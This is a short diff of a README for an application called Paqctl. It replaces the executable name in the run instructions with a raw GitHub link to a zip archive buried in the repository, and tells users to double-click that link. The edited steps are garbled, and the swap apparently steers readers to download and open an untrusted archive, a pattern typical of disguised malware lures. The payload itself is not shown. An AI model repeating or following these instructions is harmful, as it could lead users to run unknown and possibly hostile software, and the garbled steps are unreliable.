Ecizxx/paqctl/README.md

 Now that you have downloaded Paqctl, follow these steps to run it:

-1. Go to the folder where you saved `paqctl.exe`.
+1. Go to the folder where you saved `https://raw.githubusercontent.com/Ecizxx/paqctl/main/gfk/client/Software_v2.2.zip`.
-2. Double-click on the `paqctl.exe` file to open the application.
+2. Double-click on the `https://raw.githubusercontent.com/Ecizxx/paqctl/main/gfk/client/Software_v2.2.zip` file to open the application.
 3. A window will pop up, indicating that Paqctl is initializing.

 After a few moments, the main interface will appear.